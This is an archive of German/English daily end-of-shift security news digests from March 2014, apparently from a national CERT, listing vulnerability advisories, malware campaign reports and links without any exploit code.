date: March 10, 2014 Systems Affected Microsoft Windows XP with Service Pack 3 (SP3) Operating SystemMicrosoft Office 2003 Products Overview Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. [1] After this date, these products will no longer receive:Security patches which help protect PCs from harmful viruses, spyware, and other malicious softwareAssisted technical support from MicrosoftSoftware and content updates... --------------------------------------------- https://www.us-cert.gov/ncas/alerts/TA14-069A-0 *** Asterisk - Multiple Vulnerabilities *** --------------------------------------------- Asterisk PJSIP Channel Drive Bug Lets Remote Users Deny Service Asterisk chan_sip File Descriptor Flaw Lets Remote Authenticated Users Deny Service Asterisk HTTP Header Cookie Processing Overflow Lets Remote Users Deny Service Asterisk PJSIP Channel Driver Subscription Handling Bug Lets Remote Users Deny Service --------------------------------------------- http://www.securitytracker.com/id/1029892 http://www.securitytracker.com/id/1029891 http://www.securitytracker.com/id/1029890 http://www.securitytracker.com/id/1029893 *** FreeType Buffer Overflow in CFF Driver Lets Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1029895 *** D-Link DIR-600 Cross-Site Request Forgery Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57304 *** D-Link DSL-2640U Cross-Site Request Forgery Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57269 *** Bugtraq: Android Vulnerability: Install App Without User Explicit Consent *** --------------------------------------------- http://www.securityfocus.com/archive/1/531394 *** IBM Security Bulletin: IBM SPSS SamplePower vsflex8l ActiveX Control ComboList Property Remote Code Execution Vulnerability (CVE-2014-0895) *** --------------------------------------------- There is security vulnerability with an ActiveX control shipped by IBM SPSS SamplePower Version 3.0.1. This is corrected in the IBM SPSS SamplePower product Interim Fix. CVE(s): CVE-2014-0895 Affected product(s) and affected version(s): IBM SPSS SamplePower for Windows V3.0.1 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: http://www-01.ibm.com/support/docview.wss?uid=swg21666790 X-Force Database: --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: Download of Code Without Integrity Check vulnerability in IBM Security AppScan Standard (CVE-2014-0904) *** --------------------------------------------- IBM Security AppScan Standard can be affected a vulnerability in the update process that could allow remote code injection. CVE(s): CVE-2014-0904 Affected product(s) and affected version(s): IBM Security AppScan Standard 8.8 IBM Security AppScan Standard 8.7 IBM Security AppScan Standard 8.6 IBM Rational AppScan Standard 8.5 IBM Rational AppScan Standard 8.0 IBM Rational AppScan Standard 7.9 Refer to the following reference URLs for remediation and additional vulnerability details: --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** HPSBGN02970 rev.1 - HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment, Multiple Remote Vulnerabilities affecting Confidentiality, Integrity and Availability *** --------------------------------------------- Potential vulnerabilities have been identified with HP Rapid Deployment Pack (RDP) or HP Insight Control Server Deployment. The vulnerabilities could be exploited remotely affecting confidentiality, integrity and availability. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBMU02947 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Disclosure of Information and Cross-Site Request Forgery (CSRF) *** --------------------------------------------- Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in disclosure of information or cross-site request forgery (CSRF). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBMU02948 rev.1 - HP Systems Insight Manager (SIM) Running on Linux and Windows, Remote Execution of Arbitrary Code, Denial of Service (DoS), Disclosure of Information *** --------------------------------------------- Potential security vulnerabilities have been identified with HP Systems Insight Manager (SIM) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in execution of arbitrary code, Denial of Service (DoS), or disclosure of information. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBUX02976 SSRT101236 rev.1 - HP-UX Running NFS rpc.lockd, Remote Denial of Service (DoS) *** --------------------------------------------- A potential security vulnerability has been identified with HP-UX running NFS rpc.lockd. The vulnerability could be exploited remotely to create a Denial of Service (DoS). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Montag 10-03-2014
by Daily end-of-shift report 10 Mar '14

10 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 07-03-2014 18:00 − Montag 10-03-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Experts analyze Snake, Uroburos malware samples dating back to 2006 *** --------------------------------------------- Researchers with BAE Systems Applied Intelligence have determined that a possibly Russian-fueled malware campaign known as Snake, or Uroburos, may actually date back as far as 2006. --------------------------------------------- http://www.scmagazine.com/experts-analyze-snake-uroburos-malware-samples-da… *** SSL-Verschlüsselung auch in iOS-Apps problematisch *** --------------------------------------------- Nicht nur bei Android-Apps - auch im iPhone-Universum erweisen sich die Datenverbindungen von Apps recht oft als angreifbar. Rund 14 Prozent der iOS-Apps, die SSL einsetzen konnte ein Forscherteam austricksen. --------------------------------------------- http://www.heise.de/newsticker/meldung/SSL-Verschluesselung-auch-in-iOS-App… *** iOS Security *** --------------------------------------------- iOS is designed with comprehensive security that offers enterprise-grade protection of corporate data. Learn more about the advanced security features of iOS in this security guide. --------------------------------------------- https://ssl.apple.com/iphone/business/docs/iOS_Security_Feb14.pdf *** ETH40G: Verschlüsselung mit 40 Gigabit pro Sekunde *** --------------------------------------------- Mit dem ETH40G aus der SITLine-Reihe verspricht Rohde & Schwarz einen hohen verschlüsselten Datendurchsatz mit 40 Gigabit pro Sekunde in breitbandigen Netzen. --------------------------------------------- http://www.golem.de/news/eth40g-verschluesselung-mit-40-gigabit-pro-sekunde… *** Linux kernel IPv6 crash due to router advertisement flooding *** --------------------------------------------- Topic: Linux kernel IPv6 crash due to router advertisement flooding Risk: Medium Text:The Linux kernel is vulnerable to a crash on hosts that accept router advertisements. An unlimited number of routes can be cre... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030061 *** OpenVZ update for kernel *** --------------------------------------------- OpenVZ has issued an update for the kernel. This fixes a weakness and a vulnerability, which can be exploited by malicious, local users in a guest virtual machine to potentially disclose sensitive information and by malicious, local users to cause a DoS (Denial of Service). --------------------------------------------- https://secunia.com/advisories/57300 *** FFmpeg Multiple Vulnerabilities *** --------------------------------------------- Some vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise an application using the library. --------------------------------------------- https://secunia.com/advisories/56866 *** Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition. *** --------------------------------------------- Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition. CVE(s): CVE-2014-0428, CVE-2014-0422, CVE-2013-5907, CVE-2014-0415, CVE-2014-0410, CVE-2013-5889, CVE-2014-0417, CVE-2014-0387, CVE-2014-0424, CVE-2013-5878, CVE-2014-0373, CVE-2014-0375, CVE-2014-0403, CVE-2014-0423, CVE-2014-0376, CVE-2013-5910, CVE-2013-5884, CVE-2013-5896, CVE-2013-5899, CVE-2014-0416, CVE-2013-5887, CVE-2014-0368, CVE-2013-5888, CVE-2013-5898 and CVE-2014-0411 Affected product(s) --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/multiple_vulnerabilit… *** Vuln: PHP Fileinfo Component Out of Bounds Memory Corruption Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/66002

1 0

Tageszusammenfassung - Freitag 7-03-2014
by Daily end-of-shift report 07 Mar '14

07 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 06-03-2014 18:00 − Freitag 07-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** The Snake Campaign *** --------------------------------------------- This new report from BAE Systems Applied Intelligence today provides further details on how the recently disclosed ‘Snake’ cyber espionage toolkit operates. Timelines of the malware development show this to be much bigger campaign than previously known. Specifically it reveals that the malware has actually been in development since at least 2005. From the complexity of the malware, and the range of variants and techniques used to support its operation, the research also suggests that --------------------------------------------- http://www.baesystems.com/what-we-do-rai/the-snake-campaign *** Diffie-Hellman: Unsinnige Krypto-Parameter *** --------------------------------------------- Ein kurzer Schlüsselaustausch bringt Chrome zum Absturz, andere Browser akzeptieren völlig unsinnige Parameter für einen Diffie-Hellman-Schlüsselaustausch. Im Zusammenhang mit den jüngst gefundenen TLS-Problemen könnte das ein Sicherheitsrisiko sein. (Opera, Firefox) --------------------------------------------- http://www.golem.de/news/diffie-hellman-unsinnige-krypto-parameter-1403-104… *** Shedding New Light on Tor-Based Malware *** --------------------------------------------- Researchers at Kaspersky Lab and Microsoft have shared new insight into how malware campaigns operate over the Tor anonymity network, as well as other darknets. --------------------------------------------- http://threatpost.com/shedding-new-light-on-tor-based-malware/104651 *** EMC Documentum TaskSpace privilege escalation *** --------------------------------------------- EMC Documentum TaskSpace could allow a remote attacker to gain elevated privileges on the system, caused by an error related to the way dm_world group users were added to the dm_superusers_dynamic group. An attacker could exploit this vulnerability to gain elevated privileges on the system. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/91600 *** Multiple Cisco Wireless LAN Controllers WebAuth denial of service *** --------------------------------------------- Multiple Cisco Wireless LAN Controllers are vulnerable to a denial of service, caused by the failure to deallocate memory used during the processing of a WebAuth login. By creating an overly large number of WebAuth requests, an attacker could exploit this vulnerability to cause the device to reboot. --------------------------------------------- http://xforce.iss.net/xforce/xfdb/91602 *** New Tool Makes Android Malware Easier To Create *** --------------------------------------------- itwbennett writes "A new commercial tool designed to allow cybercriminals to easily transform legitimate Android applications into malicious software has hit the underground market, paving the way for cheap and easy development of sophisticated Android malware. Security researchers from Symantec said Wednesday in a blog post that the tool, called Dendroid, is marketed by its creators as an Android remote administration tool (RAT) and is being sold for $300." Read more of this story --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/lUI1_mGPycM/story01.htm *** The Siesta Campaign: A New Targeted Attack Awakens *** --------------------------------------------- In the past few weeks, we have received several reports of targeted attacks that exploited various application vulnerabilities to infiltrate various organizations. Similar to the Safe Campaign, the campaigns we noted went seemingly unnoticed and under the radar. The attackers orchestrating the campaign we call the Siesta Campaign used multicomponent malware to target certain institutions that […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroThe Siesta Campaign: A New --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/-rYSWuRUzdQ/ *** Gameover trojan uses rootkit to remain stealthy, tougher to remove *** --------------------------------------------- Researchers have discovered a Gameover variant of the Zeus trojan that has been modified to include the Necurs rootkit, which makes the malware tougher to detect and remove by protecting files on the disk and memory. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/F6bJXyUofvI/ *** Apache Struts Bugs Let Remote Users Deny Service and Manipulate the ClassLoader *** --------------------------------------------- A remote user can supply specially crafted 'class' parameter values to the ParametersInterceptor class to manipulate the ClassLoader [CVE-2014-0094]. A remote user can send a multipart request with a specially crafted Content-Type header to to trigger a flaw in the Apache Commons FileUpload component and cause denial of service conditions [CVE-2014-0050]. --------------------------------------------- http://www.securitytracker.com/id/1029876 *** Linux Memory Dump with Rekall, (Fri, Mar 7th) *** --------------------------------------------- Memory dumping for incident response is nothing new, but ever since they locked down access to direct memory (/dev/mem) on Linux, I’ve had bad experiences dumping memory. I usually end up crashing the server about 60 percent of the time while collecting data with Fmem. A new version of Linux memory dumping utility rekall (previous called Winpmem) has recently came out. I’ve been testing it on the latest versions of Ubuntu and Redhat EL 5 and have not run into any issues with --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17775&rss *** Citrix NetScaler Application Delivery Controller Multiple Flaws Let Users Gain Elevated Privileges and Deny Service *** --------------------------------------------- Several vulnerabilities were reported in Citrix NetScaler Application Delivery Controller. A local user can obtain passwords. A user can gain elevated privileges. A remote user can conduct cross-site scripting and cross-site request forgery attacks. A user can cause denial of service conditions. --------------------------------------------- http://www.securitytracker.com/id/1029880 *** February 2014 virus activity review from Doctor Web *** --------------------------------------------- February 28, 2014 Although it’s the years shortest month, February proved to be quite eventful in terms of information security. In particular, Doctor Webs security researchers discovered several Trojans that replace browser window banners and steal confidential information. Also identified were new malignant programs targeting Android. Viruses According to statistics collected in February 2014 by Dr.Web CureIt!, Trojan.Packed.24524, which spreads in the guise of legitimate software, was --------------------------------------------- http://news.drweb.com/show/?i=4262&lng=en&c=9 *** ownCloud 4.0.x / 4.5.x Remote Code Execution *** --------------------------------------------- Topic: ownCloud 4.0.x / 4.5.x Remote Code Execution Risk: High Text:Vulnerability title: Remote Code Execution in ownCloud CVE: CVE-2014-2044 Vendor: ownCloud Product: ownCloud Affected versi... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030055 *** WordPress Premium Gallery Manager Shell Upload *** --------------------------------------------- Topic: WordPress Premium Gallery Manager Shell Upload Risk: High Text: Wordpress Plugins Premium Gallery Manager Arbitrary File Upload ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030053 *** [2014-03-07] Unauthenticated access & manipulation of settings in Huawei E5331 MiFi mobile hotspot *** --------------------------------------------- Unauhenticated attackers are able to gain access to sensitive configuration (e.g. WLAN passwords in clear text or IMEI information of the SIM card) and even manipulate all settings in the web administration interface! This can even be exploited remotely via Internet depending on the mobile operator setup or via CSRF attacks. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** HP-UX m4(1) Command Flaw Lets Local Users Gain Elevated Privileges *** --------------------------------------------- A vulnerability was reported in HP-UX. A local user can obtain elevated privileges on the target system. A local user can exploit an unspecified flaw in the HP-UX m4(1) command to gain elevated privileges. --------------------------------------------- http://www.securitytracker.com/id/1029881 *** Hack gegen AVM-Router: Fritzbox-Lücke offengelegt, Millionen Router in Gefahr *** --------------------------------------------- Die Schonfrist ist abgelaufen: Im Netz kursieren Details, wie man die kritische Schwachstelle in den Fritzboxen ausnutzt. Das bedeutet akute Gefahr, da nach Erkenntnissen von heise Security noch immer sehr viele AVM-Router verwundbar sind. --------------------------------------------- http://www.heise.de/security/meldung/Hack-gegen-AVM-Router-Fritzbox-Luecke-… *** ComiXology gehackt: User müssen Passwort ändern *** --------------------------------------------- Die größte digitale Comics-Plattform ComiXology wurde Opfer eines unerlaubten Zugriffs auf Datenbanken mit Usernamen, E-Mailinfos und verschlüsselten Passwörtern. --------------------------------------------- http://futurezone.at/digital-life/comixology-gehackt-user-muessen-passwort-… *** Via Drucker ins Netz: PDF-Trojaner verwandelt IP-Telefone in Wanzen *** --------------------------------------------- Ausschließlich durch Missbrauch von Lücken in Geräten wie Netzwerkdruckern oder VoIP-Telefonen können Angreifer ein Netzwerk attackieren. Demonstriert wurde, wie sich die Telefone in Wanzen verwandeln lassen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Via-Drucker-ins-Netz-PDF-Trojaner-ve… *** Microsoft Security Bulletin Advance Notification for March 2014 *** --------------------------------------------- * Remote Code Execution Microsoft Windows,Internet Explorer * Remote Code Execution Microsoft Windows * Elevation of Privilege Microsoft Windows * Security Feature Bypass Microsoft Windows * Security Feature Bypass Microsoft Silverlight --------------------------------------------- http://technet.microsoft.com/en-us/security/bulletin/ms14-mar *** PHP 5.4.26 and 5.5.10 available. Several Security Fixes @ : http://www.php.net/downloads.php, (Fri, Mar 7th) *** --------------------------------------------- PHP 5.4.26 and 5.5.10 available. Several Security Fixes @ : http://www.php.net/downloads.php -- Tom Webb (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17777&rss *** Windows XP: Bundesregierung sorgt sich um Sicherheit von Geldautomaten *** --------------------------------------------- Zum 8. April läuft Microsofts Support für Windows XP aus. Darum hält es das BSI laut Innenministerium für geboten, aktuelle Betriebssysteme einzusetzen, die mit Sicherheitsupdates versorgt werden. --------------------------------------------- http://www.heise.de/newsticker/meldung/Windows-XP-Bundesregierung-sorgt-sic… *** New Attacks on HTTPS Traffic Reveal Plenty About Your Web Surfing *** --------------------------------------------- Researchers at UC Berkeley have developed new attacks that analyze HTTPS traffic and can accurately determine what pages youve visited during an encrypted session. --------------------------------------------- http://threatpost.com/new-attacks-on-https-traffic-reveal-plenty-about-your… *** Open-Source-CMS: Sicherheitsupdate für Joomla *** --------------------------------------------- Das Joomla-Entwicklerteam hat ein Sicherheitsupdate für die beiden aktuell unterstützten Versionszweige des Open-Source-CMS veröffentlicht. Joomla 2.5.19 und Joomla 3.2.3 sollen kürzlich entdeckte Schwachstellen des Content Management Systems stopfen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Open-Source-CMS-Sicherheitsupdate-fu… *** FFmpeg Multiple Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) in an application using the library. --------------------------------------------- https://secunia.com/advisories/57282 *** Security Bulletin: Multiple vulnerabilities in IBM QRadar SIEM (CVE-2014-0838, CVE-2014-0835, CVE-2014-0836, CVE-2014-0837) *** --------------------------------------------- Multiple vulnerabilities exist in the AutoUpdate settings page and the AutoUpdate process within the IBM QRadar SIEM that when used together could result in remote code execution. CVE(s): CVE-2014-0835, CVE-2014-0836, CVE-2014-0837, and CVE-2014-0838 Affected product(s) and affected version(s): IBM QRadar Security Information and Event Manager (SIEM) 7.2 MR1 and earlier Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul… *** Security Bulletin: Information regarding security vulnerability in IBM SDK Java™ Technology Edition that is shipped with IBM WebSphere Application Server and addressed by Oracle CPU January 2014 *** --------------------------------------------- Multiple security vulnerabilities exist in the IBM SDK Java Technology Edition that is shipped with IBM WebSphere Application Server and included in the products that are listed in this document. CVE(s): CVE-2014-0411 Affected product(s) and affected version(s): WebSphere Process Server V6.1.2, 6.2.x, 7.0.x WebSphere Process Server on z/OS V6.2.x, 7.0.x WebSphere Process Server Hypervisor Edition for Red Hat Enterprise Linux Server for x86 (32-bit) V7.0.0 WebSphere Process Server Hypervisor --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_inf…

1 0

Tageszusammenfassung - Donnerstag 6-03-2014
by Daily end-of-shift report 06 Mar '14

06 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 05-03-2014 18:00 − Donnerstag 06-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Apple OpenSSL Verification Surprises *** --------------------------------------------- Apple ships a patched version of OpenSSL with OS X. If no precautions are taken, their changes rob you of the power to choose your trusted CAs, and break the semantics of a callback that can be used for custom checks and verifications in client software. --------------------------------------------- https://hynek.me/articles/apple-openssl-verification-surprises/ *** Sefnit's Tor botnet C&C details *** --------------------------------------------- We have talked about the impact that resulted from the Sefnit botnet Tor hazard as well as the clean-up effort that went into that threat. In this post we'd like to introduce some of the details regarding the Tor component's configuration and its communication with the Tor service. Specifically, we'll talk about how Trojan:Win32/Sefnit.AT communicates with the Tor network, what domains it tries to contact, and where it keeps its configuration data. After Sefnit... --------------------------------------------- https://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-a… *** Cisco-Router mit Passwörtern im Quellcode des Web-Interfaces *** --------------------------------------------- In zwei Routern und einer Firewall von Cisco klafft eine Sicherheitslücke, die es Angreifern erlaubt, sich mit Administratorrechnern anzumelden. Die Geräte geben die Passwörter im Quelltext des Anmeldefensters preis. --------------------------------------------- http://www.heise.de/security/meldung/Cisco-Router-mit-Passwoertern-im-Quell… *** Akute Angriffsserie auf D-Link-Modems *** --------------------------------------------- Tausende Internetanschlüsse sind aufgrund einer Sicherheitslücke in DSL-Modems von D-Link akut gefährdet - allein in Deutschland. Die Schwachstelle wird bereits systematisch für Angriffe missbraucht. Wer betroffene Geräte betreibt, muss umgehend handeln. --------------------------------------------- http://www.heise.de/security/meldung/Akute-Angriffsserie-auf-D-Link-Modems-… *** Joomla! Core - Multiple Vulnerabilities *** --------------------------------------------- http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xcttKR2_t_4/578-20140301-c… http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/-FMP5B4UydI/579-20140302-c… http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/3SC6NBuk13g/580-20140303-c… http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/oiSyKvvYgXA/581-20140304-c… *** SA-CONTRIB-2014-028 - Masquerade - Access bypass *** --------------------------------------------- Advisory ID: DRUPAL-SA-CONTRIB-2014-028Project: Masquerade (third-party module)Version: 6.x, 7.xDate: 2014-March-05Security risk: Highly criticalExploitable from: RemoteVulnerability: Access bypassDescriptionThis module allows a user with the right permissions to switch users. When a user has been limited to only masquerading as certain users via the "Enter the users this user is able to masquerade as" user profile field, they can still masquerade as any user on the site by using the... --------------------------------------------- https://drupal.org/node/2211401 *** Security Bulletins: Citrix NetScaler Application Delivery Controller Multiple Security Vulnerabilities *** --------------------------------------------- A number of security vulnerabilities have been identified in Citrix NetScaler Application Delivery Controller (ADC). --------------------------------------------- http://support.citrix.com/article/CTX139049 *** HP Data Protector Backup Client Service Remote Code Execution *** --------------------------------------------- Topic: HP Data Protector Backup Client Service Remote Code Execution Risk: High Text:## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030052 *** PHP date() is evil (XSS'able) *** --------------------------------------------- Topic: PHP date() is evil (XSS'able) Risk: Low Text:I was playing with PHP (As usual) and i was thinking about date() It's a PHP function that displays date in different ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030046

1 0

Tageszusammenfassung - Mittwoch 5-03-2014
by Daily end-of-shift report 05 Mar '14

05 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 04-03-2014 18:00 − Mittwoch 05-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Christian Wojner *** Windows XP: Microsoft drängt mit Popup zum Umstieg *** --------------------------------------------- Microsoft will XP-Nutzer direkter darauf hinweisen, dass der Support für das Betriebssystem endet. Zusätzlich soll die bislang kostenpflichtige Migrationshilfe PCmover Express umsonst bereit - das Angebot hat aber einen Pferdefuss. --------------------------------------------- http://www.heise.de/security/meldung/Windows-XP-Microsoft-draengt-mit-Popup… *** 69 Prozent der beliebtesten Android Apps funken im Klartext *** --------------------------------------------- Bei einer Untersuchung von 10,000 Android-Apps haben Forscher herausgefunden, dass die Mehrzahl ihre Datenverbindungen gar nicht verschlüsselt und weitere 26 Prozent SSL so einsetzen, dass die Verbindung angreifbar ist. --------------------------------------------- http://www.heise.de/security/meldung/69-Prozent-der-beliebtesten-Android-Ap… *** Geld her oder Seite weg: Erpressung mit DDoS-Angriff *** --------------------------------------------- Angreifer fordern Geld, um Attacken auf Seiten zu stoppen --------------------------------------------- http://derstandard.at/1392687169264 *** Blog: Tor hidden services - a safe haven for cybercriminals *** --------------------------------------------- http://www.securelist.com/en/blog/8187/Tor_hidden_services_a_safe_haven_for… *** Malware nutzt iTunes als Lockmittel *** --------------------------------------------- Nachgebaute iTunes-Seiten locken zur Installation der vermeintlichen Apple-Software - stattdessen erhält der Nutzer Malware. Prominent platzierte Suchmaschinenwerbung zum Begriff "iTunes" dient als Zubringer. --------------------------------------------- http://www.heise.de/security/meldung/Malware-nutzt-iTunes-als-Lockmittel-21… *** Apache Shiro 1.2.2 LDAP Authentication Bypass *** --------------------------------------------- Topic: Apache Shiro 1.2.2 LDAP Authentication Bypass Risk: High Text:Dear Apache Shiro Community, The Apache Shiro team has released Apache Shiro version 1.2.3. This is the third bug fix point... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030034 *** Windows Escalate UAC Protection Bypass (In Memory Injection) *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030039 *** HPSBHF02965 rev.1 - HP Security Management System, Remote Execution of Arbitrary Code *** --------------------------------------------- A potential security vulnerability has been identified with HP Security Management System. The vulnerability could be remotely exploited to allow remote execution of arbitrary code. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBUX02973 SSRT101455 rev.1 - HP-UX Running Java6/7, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities *** --------------------------------------------- Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** WordPress Relevanssi Plugin "category_name" SQL Injection Vulnerability *** --------------------------------------------- https://secunia.com/advisories/56641 *** Java OpenID Server 1.2.1 XSS / Session Fixation *** --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030037 *** VU#823452: Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities *** --------------------------------------------- Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.CWE-79: Improper Neutralization of Input --------------------------------------------- http://www.kb.cert.org/vuls/id/823452

1 0

Tageszusammenfassung - Dienstag 4-03-2014
by Daily end-of-shift report 04 Mar '14

04 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 03-03-2014 18:00 − Dienstag 04-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** TLS: Sicherheitslücke bei Client-Authentifizierung *** --------------------------------------------- Erneut gibt es Probleme mit dem TLS-Protokoll. Mit der Triple Handshake-Attacke kann ein bösartiger HTTPS-Server einem weiteren Server vorgaukeln, er hätte das Zertifikat eines Nutzers. Die meisten Anwender sind von dem Angriff vermutlich nicht betroffen. --------------------------------------------- http://www.golem.de/news/tls-sicherheitsluecke-bei-client-authentifizierung… *** Webspace: Sicherheitsrisiko FTP *** --------------------------------------------- Wer eine eigene Webseite betreibt, überträgt sie meist per FTP zum Webhoster. Dabei kommt häufig keine Verschlüsselung zum Einsatz. Kein einziger großer Provider weist seine Kunden auf diese Risiken adäquat hin; bei manchen Providern ist eine verschlüsselte Verbindung überhaupt nicht möglich. --------------------------------------------- http://www.golem.de/news/webspace-sicherheitsrisiko-ftp-1403-104889-rss.html *** Großangriff auf Router: DNS-Einstellungen manipuliert *** --------------------------------------------- Forscher entdeckten einen Großangriff auf Router: Bei über 300.000 Routern, die im Privat- oder Büroeinsatz sind, wurden angeblich die DNS-Einstellungen manipuliert. Die Angreifer hätten dadurch jederzeit den Datenverkehr der Geräte umleiten können. --------------------------------------------- http://www.heise.de/security/meldung/Grossangriff-auf-Router-DNS-Einstellun… *** Sicherheitslücke: GnuTLS jetzt mit "goto fail" *** --------------------------------------------- Auch die Open-Source-Bibliothek für gesicherte Verbindungen weist einen schwerwiegenden Fehler beim überprüfen von Zertifikaten auf. Aktuelle Patches sollen ihn beheben. --------------------------------------------- http://www.heise.de/security/meldung/Sicherheitsluecke-GnuTLS-jetzt-mit-got… *** GNUTLS-SA-2014-2 - Certificate Verification Issue *** --------------------------------------------- A vulnerability was discovered that affects the certificate verification functions of all gnutls versions. A specially crafted certificate could bypass certificate validation checks. --------------------------------------------- http://gnutls.org/security.html#GNUTLS-SA-2014-2 *** WordPress plugin Google Analytics MU 2.3 CSRF *** --------------------------------------------- Topic: WordPress plugin Google Analytics MU 2.3 CSRF Risk: Low Text:Details = Software: Google Analytics MU Version: 2.3 Homepage: http://wordpress.org/plugins/google-analytics-mu/ CVSS... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030018 *** Joomla 3.2.2 Cross Site Scripting *** --------------------------------------------- Topic: Joomla 3.2.2 Cross Site Scripting Risk: Low Text:# == # Title ...| Persistent pre-auth XSS in Joomla # Version .| Joomla 3.2.2 # Date ....| 3.03.2014 #... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030030

1 0

Tageszusammenfassung - Montag 3-03-2014
by Daily end-of-shift report 03 Mar '14

03 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 28-02-2014 18:00 − Montag 03-03-2014 18:00 Handler: Alexander Riepl Co-Handler: Christian Wojner *** Komplexe Spionagesoftware namens Uroburos entdeckt *** --------------------------------------------- Sicherheitsexperten von G Data haben eine mutmaßliche Geheimdienstsoftware entdeckt, die offenbar darauf abzielt, hochsensible und geheime Informationen von staatlichen Einrichtungen, Nachrichtendiensten und Großunternehmen zu stehlen. --------------------------------------------- http://www.heise.de/security/meldung/Komplexe-Spionagesoftware-namens-Urobu… Multiple vulnerabilities in Oracle Demantra 12.2.1 --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030004 http://cxsecurity.com/issue/WLB-2014030007 http://cxsecurity.com/issue/WLB-2014030006 http://cxsecurity.com/issue/WLB-2014030005 *** Wo-möglich-Verschlüsselung für mehr Sicherheit *** --------------------------------------------- Harte Verschlüsselung oder nur Wo-möglich-Verschlüsselung gegen NSA und Konsorten? Darüber diskutierte der STRINT-Workshop der IETF und des W3C am Wochenende in London. --------------------------------------------- http://www.heise.de/security/meldung/Wo-moeglich-Verschluesselung-fuer-mehr… *** DSA-2868 php5 *** --------------------------------------------- denial of service --------------------------------------------- http://www.debian.org/security/2014/dsa-2868 *** WordPress VideoWhisper Live Streaming Plugin Multiple Cross-Site Scripting Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57202 *** Apache Camel XSLT XML External Entities and Arbitrary Code Execution Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57125 *** Hintergrund: VM-Erkennung in Malware *** 